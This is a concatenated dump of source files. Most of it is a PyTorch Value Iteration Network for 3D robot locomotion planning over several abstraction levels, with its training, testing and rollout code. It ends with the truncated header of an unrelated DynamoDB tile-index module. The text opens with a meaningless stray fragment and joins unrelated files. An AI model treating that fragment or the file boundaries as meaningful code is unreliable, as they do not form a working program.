['+022cca9529ec97a772156c152a00aad155ee6708243e65c9d211a589cb5d43234d'] # noqa actual.verify() trust/utils/models/__init__.py # __init__.py # Author: <> AIS-Bonn/abstract_vin1-10 # Model for 3D locomotion planning with individual footprints from __future__ import print_function, division import numpy as np import matplotlib.pyplot as plt import time import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim import torch.optim.lr_scheduler as lr_scheduler from torch.autograd import Variable from torch.nn.parameter import Parameter from torch.utils.data import Dataset, DataLoader from math import ceil from multiprocessing import Pool from dataloader import GridDataset_3d from utils import get_action, calculate_local_footprints_mulitlayer, get_wheel_coord, get_path_length k_values = {8:10, 16:20, 32:40} # Value Iteration Network on multiple levels of abstraction class Abstraction_VIN_3D(nn.Module): def __init__(self, size, num_actions=11, k=None, leg_x=2, # distance between wheel and robot base (x coordinate) leg_y=2, # distance between wheel and robot base (y coordinate) num_orientations=16, # number of discrete orientations device = None, name=None, level_2_features = 5, # number of features for Level-2 representation level_3_features = 10, # number of features for Level-3 representation level_1_conv_features = [10,30,60], level_1_conv_kernels = [(5,5),(3,3),(3,3)], level_1_conv_paddings = [2,1,1], level_2_conv_features = [90,120], level_2_conv_kernels = [(5,5),(3,3)], level_2_conv_paddings = [2,1], level_3_conv_features = [150], level_3_conv_kernels = [(3,3)], level_3_conv_paddings = [1]): super(Abstraction_VIN_3D, self).__init__() self.size = size # grid world size self.size_eff = size//4 # size of each abstraction map self.level_2_features = level_2_features self.level_3_features = level_3_features self.features = 1+level_2_features+level_3_features # overall number of features of reward map (sum over all 3 levels) if name is None: self.name = 'Abstraction_VIN_3D_'+str(size) else: self.name=name print("Network name: ", self.name) self.device = device or torch.device("cuda:0" if torch.cuda.is_available() else "cpu") self.k = k or int(1.5*k_values[self.size_eff]) # number of iterations within VI module self.leg_x = leg_x self.leg_y = leg_y self.num_orientations = num_orientations self.rotation_step_size = 2*np.pi/num_orientations self.num_actions = num_actions # precompute orientation dependent local footprints self.local_footprints_1, self.local_footprints_2, self.local_footprints_3 = calculate_local_footprints_mulitlayer(leg_x, leg_y, num_orientations) self.local_footprints_1, self.local_footprints_2, self.local_footprints_3 = self.local_footprints_1.to(self.device), self.local_footprints_2.to(self.device), self.local_footprints_3.to(self.device) # learn abstract representations self.learn_level_2 = nn.Conv2d( in_channels=1, out_channels=level_2_features, kernel_size=(2, 2), stride=2, padding=0, bias=False) self.learn_level_3 = nn.Conv2d( in_channels=level_2_features, out_channels=level_3_features, kernel_size=(2, 2), stride=2, padding=0, bias=False) # process Level-1 self.abstraction_1_pad = nn.ConstantPad2d(int(0.25*self.size_eff), 0) self.level_1_conv = nn.ModuleList() self.level_1_conv.append(nn.Conv2d(in_channels=2, out_channels=level_1_conv_features[0], kernel_size=level_1_conv_kernels[0], stride=1, padding=level_1_conv_paddings[0], bias=True)) for i in range(1, len(level_1_conv_features)): 
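# remaining Level-1 convolutions: each layer consumes the previous layer's
# feature maps (level_1_conv_features[i-1] -> level_1_conv_features[i])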
self.level_1_conv.append(nn.Conv2d(in_channels=level_1_conv_features[i-1], out_channels=level_1_conv_features[i], kernel_size=level_1_conv_kernels[i], stride=1, padding=level_1_conv_paddings[i], bias=True)) # process Level-2 self.abstraction_2_pad = nn.ConstantPad2d(self.size_eff//4, 0) self.level_2_conv = nn.ModuleList() self.level_2_conv.append(nn.Conv2d(in_channels=self.num_orientations+level_2_features+1, out_channels=level_2_conv_features[0], kernel_size=level_2_conv_kernels[0], stride=1, padding=level_2_conv_paddings[0], bias=True)) for i in range(1, len(level_2_conv_features)): self.level_2_conv.append(nn.Conv2d(in_channels=level_2_conv_features[i-1], out_channels=level_2_conv_features[i], kernel_size=level_2_conv_kernels[i], stride=1, padding=level_2_conv_paddings[i], bias=True)) # process Level-3 self.level_3_conv = nn.ModuleList() self.level_3_conv.append(nn.Conv2d(in_channels=self.num_orientations*level_2_features+level_3_features+1, out_channels=level_3_conv_features[0], kernel_size=level_3_conv_kernels[0], stride=1, padding=level_3_conv_paddings[0], bias=True)) for i in range(1, len(level_3_conv_features)): self.level_3_conv.append(nn.Conv2d(in_channels=level_3_conv_features[i-1], out_channels=level_3_conv_features[i], kernel_size=level_3_conv_kernels[i], stride=1, padding=level_3_conv_paddings[i], bias=True)) # generate reward map self.r1 = nn.Conv2d( in_channels=level_1_conv_features[-1], out_channels=1*self.num_orientations, kernel_size=(1, 1), stride=1, padding=0, bias=False) self.r2 = nn.Conv2d( in_channels=level_2_conv_features[-1], out_channels=level_2_features*self.num_orientations, kernel_size=(1, 1), stride=1, padding=0, bias=False) self.r3 = nn.Conv2d( in_channels=level_3_conv_features[-1], out_channels=level_3_features*self.num_orientations, kernel_size=(1, 1), stride=1, padding=0, bias=False) # value iteration self.q1 = nn.Conv3d( in_channels=1, out_channels=num_actions, kernel_size=(3, 3, 3), stride=1, padding=0, bias=False) self.q2 = nn.Conv3d( in_channels=level_2_features, out_channels=num_actions, kernel_size=(3, 3, 3), stride=1, padding=0, bias=False) self.q3 = nn.Conv3d( in_channels=level_3_features, out_channels=num_actions, kernel_size=(3, 3, 3), stride=1, padding=0, bias=False) self.w = Parameter( torch.zeros(num_actions, 1, 3, 3, 3), requires_grad=True) # reactive policy (map state values to action probabilities) self.fc = nn.Linear(in_features=11, out_features=num_actions, bias=False) def forward(self, occ_map, goal_map, start_orientation, show_reward_map = False): # Create abstraction maps: # extract Level-1 map level_1 = occ_map[:,:,self.size//2 - self.size_eff//2: self.size//2 + self.size_eff//2,self.size//2 - self.size_eff//2: self.size//2 + self.size_eff//2] # create Level-2 representation level_2_full = self.learn_level_2(occ_map) # extract Level-2 map level_2 = level_2_full[:,:,self.size//4 - self.size_eff//2: self.size//4 + self.size_eff//2,self.size//4 - self.size_eff//2: self.size//4 + self.size_eff//2] # create Level-3 map level_3 = self.learn_level_3(level_2_full) # Create abstract goal maps goal_1 = goal_map[:,:,self.size//2 - self.size_eff//2: self.size//2 + self.size_eff//2,self.size//2 - self.size_eff//2: self.size//2 + self.size_eff//2] goal_2_full = F.max_pool2d(goal_map, (2,2)) goal_2 = goal_2_full[:,:,self.size//4 - self.size_eff//2: self.size//4 + self.size_eff//2,self.size//4 - self.size_eff//2: self.size//4 + self.size_eff//2] goal_3 = F.max_pool2d(goal_2_full, (2,2)) # Process Level 1: # stack with goal map abstraction_1 = 
torch.cat([level_1, goal_1], dim=1) # generate Level-1 reward map for conv in self.level_1_conv: abstraction_1 = conv(abstraction_1) abstraction_1 = self.r1(abstraction_1) r1 = abstraction_1 # reduce resolution (to fit resolution of Level-2) abstraction_1 = F.max_pool2d(abstraction_1, (2,2)) # pad abstraction_1 map (to match size of Level-2 map) abstraction_1 = self.abstraction_1_pad(abstraction_1) # Process Level-2: # stack with preprocessed Level-1 map and Level-2 goal map abstraction_2 = torch.cat([abstraction_1, level_2, goal_2], dim=1) # generate Level-2 reward map for conv in self.level_2_conv: abstraction_2 = conv(abstraction_2) abstraction_2 = self.r2(abstraction_2) r2 = abstraction_2 # reduce resolution (to fit resolution of Level-3) abstraction_2 = F.max_pool2d(abstraction_2, (2,2)) # pad abstraction_2 map (to match Level-3 size) abstraction_2 = self.abstraction_2_pad(abstraction_2) # Process Level-3: # stack with preprocessed Level-2 map and Level-3 goal map abstraction_3 = torch.cat([abstraction_2, level_3, goal_3], dim=1) # generate Level-3 reward map for conv in self.level_3_conv: abstraction_3 = conv(abstraction_3) reward_3 = abstraction_3 r3 = self.r3(abstraction_3) # generate reward map r = torch.cat([r1,r2,r3], dim=1) # prepare for 3D convolution r_4d = torch.empty(r.size(0),self.features,self.num_orientations,self.size_eff,self.size_eff, device=self.device) # sum over footprints r_4d[:,0,:,:,:] = F.conv2d(r[:,0::self.features,:,:], self.local_footprints_1.unsqueeze(1), padding=2, groups = self.num_orientations) for i in range(1,self.level_2_features+1): r_4d[:,i,:,:,:] = F.conv2d(r[:,i::self.features,:,:], self.local_footprints_2.unsqueeze(1), padding=1, groups = self.num_orientations) for i in range(self.level_2_features+1,self.features): r_4d[:,i,:,:,:] = F.conv2d(r[:,i::self.features,:,:], self.local_footprints_3.unsqueeze(1), padding=1, groups = self.num_orientations) # pad reward map r_pad = F.pad(r_4d,(1,1,1,1,1,1), 'constant', 0) # cyclic padding for orientations r_pad[:,:,0,1:-1,1:-1] = r_4d[:,:,-1,:,:] r_pad[:,:,-1,1:-1,1:-1] = r_4d[:,:,0,:,:] # transitions from high to low abstraction levels: # from Level-2 to Level-1 r_pad[:,0,1:-1,1:-1,0] = F.interpolate(r_4d[:,1:self.level_2_features+1,:,self.size_eff//4:-self.size_eff//4,self.size_eff//4-1].mean(1,keepdim=True), scale_factor = (1,2)).squeeze(1) r_pad[:,0,1:-1,1:-1,-1] = F.interpolate(r_4d[:,1:self.level_2_features+1,:,self.size_eff//4:-self.size_eff//4,-self.size_eff//4].mean(1,keepdim=True), scale_factor = (1,2)).squeeze(1) r_pad[:,0,1:-1,0,1:-1] = F.interpolate(r_4d[:,1:self.level_2_features+1,:,self.size_eff//4-1,self.size_eff//4:-self.size_eff//4].mean(1,keepdim=True), scale_factor = (1,2)).squeeze(1) r_pad[:,0,1:-1,-1,1:-1] = F.interpolate(r_4d[:,1:self.level_2_features+1,:,-self.size_eff//4,self.size_eff//4:-self.size_eff//4].mean(1,keepdim=True), scale_factor = (1,2)).squeeze(1) r_pad[:,0,1:-1,0,0] = r_4d[:,1:self.level_2_features+1,:,self.size_eff//4-1,self.size_eff//4-1].mean(1,keepdim=True).squeeze(1) r_pad[:,0,1:-1,0,-1] = r_4d[:,1:self.level_2_features+1,:,self.size_eff//4-1,-self.size_eff//4].mean(1,keepdim=True).squeeze(1) r_pad[:,0,1:-1,-1,0] = r_4d[:,1:self.level_2_features+1,:,-self.size_eff//4,self.size_eff//4-1].mean(1,keepdim=True).squeeze(1) r_pad[:,0,1:-1,-1,-1] = r_4d[:,1:self.level_2_features+1,:,-self.size_eff//4,-self.size_eff//4].mean(1,keepdim=True).squeeze(1) # from Level-3 to Level-2 r_pad[:,1,1:-1,1:-1,0] = 
F.interpolate(r_4d[:,self.level_2_features+1:,:,self.size_eff//4:-self.size_eff//4,self.size_eff//4-1].mean(1,keepdim=True), scale_factor = (1,2)).squeeze(1) r_pad[:,1,1:-1,1:-1,-1] = F.interpolate(r_4d[:,self.level_2_features+1:,:,self.size_eff//4:-self.size_eff//4,-self.size_eff//4].mean(1,keepdim=True), scale_factor = (1,2)).squeeze(1) r_pad[:,1,1:-1,0,1:-1] = F.interpolate(r_4d[:,self.level_2_features+1:,:,self.size_eff//4-1,self.size_eff//4:-self.size_eff//4].mean(1,keepdim=True), scale_factor = (1,2)).squeeze(1) r_pad[:,1,1:-1,-1,1:-1] = F.interpolate(r_4d[:,self.level_2_features+1:,:,-self.size_eff//4,self.size_eff//4:-self.size_eff//4].mean(1,keepdim=True), scale_factor = (1,2)).squeeze(1) r_pad[:,1,1:-1,0,0] = r_4d[:,self.level_2_features+1:,:,self.size_eff//4-1,self.size_eff//4-1].mean(1,keepdim=True).squeeze(1) r_pad[:,1,1:-1,0,-1] = r_4d[:,self.level_2_features+1:,:,self.size_eff//4-1,-self.size_eff//4].mean(1,keepdim=True).squeeze(1) r_pad[:,1,1:-1,-1,0] = r_4d[:,self.level_2_features+1:,:,-self.size_eff//4,self.size_eff//4-1].mean(1,keepdim=True).squeeze(1) r_pad[:,1,1:-1,-1,-1] = r_4d[:,self.level_2_features+1:,:,-self.size_eff//4,-self.size_eff//4].mean(1,keepdim=True).squeeze(1) # use same padding values for all Level-2 features for i in range(2,self.level_2_features+1): r_pad[:,i,:,1:-1,0] = r_pad[:,1,:,1:-1,0] r_pad[:,i,:,1:-1,-1] = r_pad[:,1,:,1:-1,-1] r_pad[:,i,:,0,1:-1] = r_pad[:,1,:,0,1:-1] r_pad[:,i,:,-1,1:-1] = r_pad[:,1,:,-1,1:-1] r_pad[:,i,:,0,0] = r_pad[:,1,:,0,0] r_pad[:,i,:,0,-1] = r_pad[:,1,:,0,-1] r_pad[:,i,:,-1,0] = r_pad[:,1,:,-1,0] r_pad[:,i,:,-1,-1] = r_pad[:,1,:,-1,-1] # value iteration (on each abstraction level in parallel) q1 = self.q1(r_pad[:,0,:,:,:].unsqueeze(1)) q2 = self.q2(r_pad[:,1:self.level_2_features+1,:,:,:]) q3 = self.q3(r_pad[:,self.level_2_features+1:,:,:,:]) v1, _ = torch.max(q1, dim=1, keepdim=True) v2, _ = torch.max(q2, dim=1, keepdim=True) v3, _ = torch.max(q3, dim=1, keepdim=True) v = torch.cat([v1,v2,v3],1) for i in range(0, self.k - 1): # information flow between levels after each iteration: # information flow from low to high abstraction level # (replace state value for more abstract cell with maximum state value from # the lower-level cells that describe the same area) v[:,1,:,self.size_eff//4:-self.size_eff//4,self.size_eff//4:-self.size_eff//4] = F.max_pool2d(v[:,0,:,:,:].clone(), (2,2)) v[:,2,:,self.size_eff//4:-self.size_eff//4,self.size_eff//4:-self.size_eff//4] = F.max_pool2d(v[:,1,:,:,:].clone(), (2,2)) # circular padding for orientations v_pad = F.pad(v,(1,1,1,1,1,1), 'constant', 0) v_pad[:,:,0,1:-1,1:-1] = v[:,:,-1,:,:] v_pad[:,:,-1,1:-1,1:-1] = v[:,:,0,:,:] # information flow from high to low abstraction level # (pad lower-level with values from neighboring higher-level cells) v_pad[:,0:2,1:-1,1:-1,0] = F.interpolate(v[:,1:3,:,self.size_eff//4:-self.size_eff//4,self.size_eff//4-1], scale_factor = (1,2)) v_pad[:,0:2,1:-1,1:-1,-1] = F.interpolate(v[:,1:3,:,self.size_eff//4:-self.size_eff//4,-self.size_eff//4], scale_factor = (1,2)) v_pad[:,0:2,1:-1,0,1:-1] = F.interpolate(v[:,1:3,:,self.size_eff//4-1,self.size_eff//4:-self.size_eff//4], scale_factor = (1,2)) v_pad[:,0:2,1:-1,-1,1:-1] = F.interpolate(v[:,1:3,:,-self.size_eff//4,self.size_eff//4:-self.size_eff//4], scale_factor = (1,2)) v_pad[:,0:2,1:-1,0,0] = v[:,1:3,:,self.size_eff//4-1,self.size_eff//4-1] v_pad[:,0:2,1:-1,0,-1] = v[:,1:3,:,self.size_eff//4-1,-self.size_eff//4] v_pad[:,0:2,1:-1,-1,0] = v[:,1:3,:,-self.size_eff//4,self.size_eff//4-1] 
v_pad[:,0:2,1:-1,-1,-1] = v[:,1:3,:,-self.size_eff//4,-self.size_eff//4] # Bellman update (on each abstraction level in parallel) q1 = F.conv3d( torch.cat([r_pad[:,0,:,:,:].unsqueeze(1), v_pad[:,0,:,:,:].unsqueeze(1)], 1), torch.cat([self.q1.weight, self.w], 1), stride=1, padding=0) q2 = F.conv3d( torch.cat([r_pad[:,1:self.level_2_features+1,:,:,:], v_pad[:,1,:,:,:].unsqueeze(1)], 1), torch.cat([self.q2.weight, self.w], 1), stride=1, padding=0) q3 = F.conv3d( torch.cat([r_pad[:,self.level_2_features+1:,:,:,:], v_pad[:,2,:,:,:].unsqueeze(1)], 1), torch.cat([self.q3.weight, self.w], 1), stride=1, padding=0) v1, _ = torch.max(q1, dim=1, keepdim=True) v2, _ = torch.max(q2, dim=1, keepdim=True) v3, _ = torch.max(q3, dim=1, keepdim=True) v = torch.cat([v1,v2,v3],1) # information flow from low to high abstraction level v[:,1,:,self.size_eff//4:-self.size_eff//4,self.size_eff//4:-self.size_eff//4] = F.max_pool2d(v[:,0,:,:,:].clone(), (2,2)) v[:,2,:,self.size_eff//4:-self.size_eff//4,self.size_eff//4:-self.size_eff//4] = F.max_pool2d(v[:,1,:,:,:].clone(), (2,2)) # circular padding for orientations v_pad = F.pad(v,(1,1,1,1,1,1), 'constant', 0) v_pad[:,:,0,1:-1,1:-1] = v[:,:,-1,:,:] v_pad[:,:,-1,1:-1,1:-1] = v[:,:,0,:,:] # information flow from high to low abstraction level v_pad[:,0:2,1:-1,1:-1,0] = F.interpolate(v[:,1:3,:,self.size_eff//4:-self.size_eff//4,self.size_eff//4-1], scale_factor = (1,2)) v_pad[:,0:2,1:-1,1:-1,-1] = F.interpolate(v[:,1:3,:,self.size_eff//4:-self.size_eff//4,-self.size_eff//4], scale_factor = (1,2)) v_pad[:,0:2,1:-1,0,1:-1] = F.interpolate(v[:,1:3,:,self.size_eff//4-1,self.size_eff//4:-self.size_eff//4], scale_factor = (1,2)) v_pad[:,0:2,1:-1,-1,1:-1] = F.interpolate(v[:,1:3, :,-self.size_eff//4,self.size_eff//4:-self.size_eff//4], scale_factor = (1,2)) v_pad[:,0:2,1:-1,0,0] = v[:,1:3,:,self.size_eff//4-1,self.size_eff//4-1] v_pad[:,0:2,1:-1,0,-1] = v[:,1:3,:,self.size_eff//4-1,-self.size_eff//4] v_pad[:,0:2,1:-1,-1,0] = v[:,1:3,:,-self.size_eff//4,self.size_eff//4-1] v_pad[:,0:2,1:-1,-1,-1] = v[:,1:3,:,-self.size_eff//4,-self.size_eff//4] # one-step look-ahead q1 = F.conv3d( torch.cat([r_pad[:,0,:,:,:].unsqueeze(1), v_pad[:,0,:,:,:].unsqueeze(1)], 1), torch.cat([self.q1.weight, self.w], 1), stride=1, padding=0) # get state values for neighbors of start state q_out = q1[:,:,:, self.size_eff//2, self.size_eff//2] orientation_slice = start_orientation.expand(1,self.num_actions,q1.size(0)).permute(2,1,0) q_out = q_out.gather(2, orientation_slice).squeeze(2) # map state values to action probabilities logits = self.fc(q_out) return logits def train(self, num_iterations=1, batch_size=128, lr= 0.001, plot_curves=False, lr_cycle_length = 10, print_stat=True, T_mult=1.5, lr_decay_factor=0.95): return _train(self, num_iterations=num_iterations, batch_size=batch_size, lr=lr, plot_curves=plot_curves, lr_cycle_length=lr_cycle_length, print_stat=print_stat, T_mult=T_mult, lr_decay_factor=lr_decay_factor) # compute next-step accuracy def test(self, batch_size=128, validation=True, full_length=True): return _test(self, batch_size=batch_size, validation=validation, full_length=full_length) # compute success rate for whole paths def rollout(self, batch_size=128, validation=True, num_workers=4): return _rollout(self, batch_size=batch_size, validation=validation, num_workers=num_workers) # train net using RMSprop and cyclic learning rate scheduler def _train(net, num_iterations=1, batch_size=128, lr= 0.001, plot_curves=False, lr_cycle_length = 48, print_stat=True, T_mult=1.5, 
lr_decay_factor=0.95): # load training data dataset = GridDataset_3d(net.size, num_orientations=net.num_orientations, full_paths=False, data_type='training') trainloader = DataLoader(dataset, batch_size = batch_size, shuffle = True, num_workers = 4) criterion = nn.CrossEntropyLoss() optimizer = optim.RMSprop(net.parameters(), lr, eps=1e-6) error_stat = [] evaluation_stat = [] rollout_stat = [] validation_epochs = [] # index of start epoch for each lr cycle best_success = 0. print('Starting Training.') print('Learning Rate Cycles: ', num_iterations) print('Batch size: ', batch_size) print('Expert demonstrations: ', len(dataset)) print('Optimizer: ', optimizer) T_max = int(lr_cycle_length) # lr cycle length eta_min = 0.0001 scheduler = lr_scheduler.CosineAnnealingLR(optimizer, T_max, eta_min) # learning rate cycles for cycle in range(num_iterations): print('Cylce length: ', T_max) print('Learning rate: ', lr) for epoch in range(T_max): running_loss = 0.0 num_batches = 0 start_time_epoch = time.time() # run once over all training examples for i, data in enumerate(trainloader, 0): # reset gradients to zero optimizer.zero_grad() # get training data occ_maps, goal_maps, labels, start_orientations = data['environment'].to(net.device), data['goal'].to(net.device), data['label'].to(net.device), data['start orientation'].to(net.device) # forward pass outputs = net.forward(occ_maps, goal_maps, start_orientations) # compute training loss loss = criterion(outputs,torch.max(labels, 1)[1]) # backward pass loss.backward() optimizer.step() running_loss += loss.item() num_batches += 1 duration_epoch = time.time() - start_time_epoch # keep track of average loss for learning curve error_stat.append(running_loss/num_batches) print('[epoch %d] loss per batch: %.10f, time: %f' % (epoch + 1, running_loss / num_batches, duration_epoch)) scheduler.step() # save index of start epoch of current lr cycle (for learning curve visualization) if len(validation_epochs) == 0: validation_epochs.append(T_max) else: validation_epochs.append(validation_epochs[-1]+T_max) # test net on validation set accuracy = net.test(batch_size=2*batch_size, full_length=True, validation=True) accuracy_sampled = net.test(batch_size=2*batch_size, full_length=False, validation=True) evaluation_stat.append(accuracy) success=net.rollout(batch_size=2*batch_size, validation=True) rollout_stat.append(success) print('[cycle %d] accuracy (full): %f, accuracy (sampled): %f, success: %f, time: %f' % (cycle + 1, accuracy, accuracy_sampled, success, duration_epoch)) # save network state which achieves best success rate on validation set if success > best_success or cycle == 0: best_success = success torch.save(net.state_dict(), 'network/%s.pt' % net.name) # increase cycle length and decrease initial lr for next cycle T_max = int(ceil(T_max*T_mult)) lr *= lr_decay_factor optimizer = optim.RMSprop(net.parameters(), lr, eps=1e-6) scheduler = lr_scheduler.CosineAnnealingLR(optimizer, T_max, eta_min) print('Finished Training.') print('') # get network state with best success rate on validation set net.load_state_dict(torch.load('network/%s.pt' % net.name)) # plot learning curves if plot_curves: plt.figure(0) plt.plot(range(len(error_stat)), error_stat) plt.savefig('learning_curves/training_loss_%s.png' % net.name) plt.figure(1) plt.plot(range(len(evaluation_stat)), evaluation_stat) plt.savefig('learning_curves/accuracy_%s.png' % net.name) plt.figure(2) plt.plot(range(len(rollout_stat)), rollout_stat) plt.savefig('learning_curves/success_%s.png' % net.name) # 
print training statistics to text file if print_stat: error_stat = np.array(error_stat) epoch_list = np.arange(1,len(error_stat)+1) train_data = np.column_stack((epoch_list, error_stat)) np.savetxt('learning_curves/training_loss_%s.txt' % net.name, train_data, delimiter = " ", fmt=("%d","%f"), header = "Epoch Loss") validation_epochs = np.array(validation_epochs) evaluation_stat = np.array(evaluation_stat) rollout_stat = np.array(rollout_stat) validation_data = np.column_stack((validation_epochs, evaluation_stat, rollout_stat)) np.savetxt('learning_curves/validation_%s.txt' % net.name, validation_data, delimiter = " ", fmt=("%d","%f","%f"), header = "Epoch Accuracy Success") # compute next-step accuracy def _test(net, batch_size=128, validation=True, full_length=True): with torch.no_grad(): if validation: # load validation set dataset = GridDataset_3d(net.size, data_type='validation', full_paths=full_length) else: print('Starting Test.') print('Full length: ', full_length) # load evaluation set dataset = GridDataset_3d(net.size, data_type='evaluation', full_paths=full_length) testloader = DataLoader(dataset, batch_size = batch_size, shuffle = False, num_workers = 4) num_wrong_actions = 0 num_batches = 0 running_loss = 0. running_loss_first_step = 0. start_time = time.time() # iterate once over each example for i, data in enumerate(testloader, 0): occ_maps, goal_maps, labels, start_orientations = data['environment'].to(net.device), data['goal'].to(net.device), data['label'].to(net.device), data['start orientation'].to(net.device) output = net.forward(occ_maps, goal_maps, start_orientations) num_batches += 1 # count wrong actions for j in range(output.size()[0]): # get action with highest probability action = output[j].max(0)[1] action = action.item() # get expert action label = labels[j].argmax(0).item() if action != label: num_wrong_actions += 1 duration = time.time() - start_time accuracy = 1 - num_wrong_actions/len(dataset) if not validation: print('Size of Test Set: ', len(dataset)) print('Loss per batch: ', running_loss / num_batches) print('Number of wrong actions: ', num_wrong_actions) print("Accuracy: ", accuracy) print("Time: ", duration) print('') return accuracy # unroll single full path (for visualization) def _get_path(net, dataset, map, map_index, start_pos, goal_pos, max_number_steps): with torch.no_grad(): success = True path = [start_pos] pos = start_pos for idx in range(max_number_steps): # ensure that whole perceptive area lies within grid world if pos[0] >= 3*map.size()[0]//4 or pos[0] < map.size()[0]//4 or pos[1] >= 3*map.size()[1]//4 or pos[1] < map.size()[1]//4: return (path, False) # reached goal if pos[0] == goal_pos[0] and pos[1] == goal_pos[1] and pos[2] == goal_pos[2]: return (path, success) if idx > 0: # get indices of the cells that contain the wheels fl,fr,bl,br = get_wheel_coord(pos, net.rotation_step_size, net.leg_x, net.leg_y) fl,fr,bl,br = fl.round().long(),fr.round().long(),bl.round().long(),br.round().long() # check collision for each wheel if map[fl[0],fl[1]] == 1 or map[fr[0],fr[1]] == 1 or map[bl[0],bl[1]] == 1 or map[br[0],br[1]] == 1: success = False # get net input for current position start_orientation = pos[2].to(net.device) occ_map, goal_map = dataset.get_inputs((map_index, pos, goal_pos)) occ_map, goal_map = occ_map.unsqueeze_(0).to(net.device), goal_map.unsqueeze_(0).to(net.device) # predict next action action_vector = net.forward(occ_map, goal_map, start_orientation) action = get_action(action_vector[0], dim=3) # update position and 
orientation new_pos = pos + action if new_pos[2] < 0: new_pos[2] += net.num_orientations elif new_pos[2] >= net.num_orientations: new_pos[2] -= net.num_orientations path.append(new_pos) pos = new_pos if pos[0] == goal_pos[0] and pos[1] == goal_pos[1] and pos[2] == goal_pos[2]: # reached goal return (path, success) else: # did not reach goal return (path, False) # compute success rate for whole paths def _rollout(net, batch_size=128, validation=True, num_workers=4): with torch.no_grad(): crashes = 0. diff = 0. net_length = 0. expert_length = 0. avg_length = 0. num_successful = 0 # load dataset and make it available to all workers global rollout_data if validation: rollout_data = GridDataset_3d(net.size, full_paths=True, data_type='validation') else: rollout_data = GridDataset_3d(net.size, full_paths=True, data_type='evaluation') iterations = rollout_data.num_examples # list of all tasks (describes task through map and path indices) open_paths = [(i,j) for i in range(rollout_data.num_examples) for j in range(rollout_data.num_paths_per_map)] paths = [[[rollout_data.expert_paths[map_id][path_id][0]] for path_id in range(rollout_data.num_paths_per_map)] for map_id in range(rollout_data.num_examples)] success = [[ False for path_id in range(rollout_data.num_paths_per_map)] for map_id in range(rollout_data.num_examples)] path_length = 0 if not validation: print("Starting Rollout-Test.") start_time = time.time() pool = Pool(processes=num_workers) while len(open_paths) != 0 and path_length < 1000: parameters = [] # get map indices and current positions for all open paths for map_id, path_id in open_paths: parameters.append((map_id, paths[map_id][path_id][-1], rollout_data.expert_paths[map_id][path_id][-1])) # get inputs for all open paths inputs = pool.map(_get_inputs, parameters) path_length += 1 current_open_task_id = 0 # predict next step for each open path for input_batch in batch(inputs,batch_size): # unpack inputs occ_maps, goal_maps, start_orientations = zip(*input_batch) occ_maps, goal_maps, start_orientations = torch.stack(occ_maps, dim=0).to(net.device), torch.stack(goal_maps,dim=0).to(net.device), torch.stack(start_orientations,dim=0).to(net.device) # predict next action action_vectors = net.forward(occ_maps, goal_maps, start_orientations) for i in range(action_vectors.size(0)): # update positions and paths map_id, path_id = open_paths[current_open_task_id] action = get_action(action_vectors[i], dim=3) pos = paths[map_id][path_id][-1] + action if pos[2] < 0: pos[2] += net.num_orientations elif pos[2] >= net.num_orientations: pos[2] -= net.num_orientations paths[map_id][path_id].append(pos) goal_pos = rollout_data.expert_paths[map_id][path_id][-1] # reached goal if pos[0] == goal_pos[0] and pos[1] == goal_pos[1] and pos[2] == goal_pos[2]: success[map_id][path_id] = True del open_paths[current_open_task_id] continue # check upper border for path length # (to detect oscillation) if path_length > 2*len(rollout_data.expert_paths[map_id][path_id]): del open_paths[current_open_task_id] continue # ensure that perceptive area lies completely within grid world if pos[0] >= 3*rollout_data.grids[map_id].size()[0]//4 or pos[0] < rollout_data.grids[map_id].size()[0]//4 or pos[1] >= 3*rollout_data.grids[map_id].size()[1]//4 or pos[1] < rollout_data.grids[map_id].size()[1]//4: del open_paths[current_open_task_id] continue # get indices of cells that contain the wheels fl,fr,bl,br = get_wheel_coord(pos, net.rotation_step_size, net.leg_x, net.leg_y) fl,fr,bl,br = 
fl.round().long(),fr.round().long(),bl.round().long(),br.round().long() # check collisions for each wheel if rollout_data.grids[map_id][fl[0],fl[1]] == 1 or rollout_data.grids[map_id][fr[0],fr[1]] == 1 or rollout_data.grids[map_id][bl[0],bl[1]] == 1 or rollout_data.grids[map_id][br[0],br[1]] == 1: del open_paths[current_open_task_id] continue current_open_task_id += 1 if not validation: if path_length % 20 == 0: print("Computed paths up to length ", path_length) pool.close() # count successful paths num_successful = 0 for i in range(rollout_data.num_examples): for j in range(rollout_data.num_paths_per_map): paths[i][j] = torch.stack(paths[i][j], dim=0) if success[i][j]: num_successful += 1 if not validation: # compare length of network and expert paths diff += get_path_length(paths[i][j], dim=3)-get_path_length(rollout_data.expert_paths[i][j],dim=3) net_length += get_path_length(paths[i][j], dim=3) expert_length += get_path_length(rollout_data.expert_paths[i][j], dim=3) if not validation: print("Success: ", num_successful/ len(rollout_data)) print("Path length (network): ", net_length) print("Path length (expert): ", expert_length) print("Average absolute path difference: ", diff/ num_successful) print("average relative path difference: ", net_length/expert_length) print("Duration: ", time.time() - start_time) print("") return num_successful/ len(rollout_data) def _get_inputs(parameters): with torch.no_grad(): map_index, pos_t1, pos_t2 = parameters rollout_img = rollout_data.grids[map_index] # environment map occ_map = rollout_img[pos_t1[0] - rollout_data.size//2:pos_t1[0]+rollout_data.size//2,pos_t1[1] - rollout_data.size//2:pos_t1[1]+rollout_data.size//2] # goal map goal_map = torch.FloatTensor(rollout_data.size, rollout_data.size).fill_(0) goal_orientation = pos_t2[2] local_pos_t2 = pos_t2[0:2] - pos_t1[0:2] + rollout_data.centre if local_pos_t2[0].item() >= 0 and local_pos_t2[0].item() < rollout_data.size and local_pos_t2[1].item() >= 0 and local_pos_t2[1].item() < rollout_data.size: goal_map[local_pos_t2[0], local_pos_t2[1]] = goal_orientation+1 return occ_map.unsqueeze(0), goal_map.unsqueeze(0), pos_t1[2] def batch(iterable, step=1): length = len(iterable) for i in range(0, length, step): yield iterable[i:min(i + step, length)] nddynamo/boss_tileindexdb.py # Copyright 2014 NeuroData (http://neurodata.io) # Copyright 2016 The Johns Hopkins University Applied Physics Laboratory # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function from __future__ import absolute_import from ndingest.settings.settings import Settings settings = Settings.load() import botocore import boto3 from boto3.dynamodb.conditions import Key, Attr from operator import floordiv from ndingest.util.bossutil import BossUtil import time #try: # # 